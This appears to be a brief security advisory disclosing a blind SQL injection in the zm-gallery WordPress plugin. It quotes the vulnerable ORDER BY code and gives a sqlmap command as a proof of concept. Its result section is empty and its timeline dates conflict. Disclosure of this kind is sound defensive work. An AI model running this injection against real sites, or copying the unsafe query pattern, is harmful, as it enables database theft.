Homepage:
https://wordpress.org/plugins/zm-gallery/
Description:
Type user access: admin user.
$_GET[‘order’] is escaped wrong. Attack with Blind Injection
File / Code:
Path: /wp-content/plugin/zm-gallery/zm-gallery-list.php
Line: 126
if( isset($_GET['orderby']) ) {
$order = ' ORDER BY ' . esc_sql($_GET['orderby']);
if( isset($_GET['order']) ) {
$order .= ' ' . esc_sql($_GET['order']);
}
}
$table_name = $wpdb->prefix . 'zm_gallery';
$gallery = $wpdb->get_results("SELECT * FROM $table_name " . $order );
Proof of Concept:
1 – Login with admin user.
2 – Use sqlmap;
python sqlmap.py -u "http://target/wp-admin/admin.php?page=zm_ gallery&orderby=name&order= desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=Mysql
2 – Result:
Timeline:
- 14/12/2016 – Discovered
- 13/12/2016 – Vendor not finded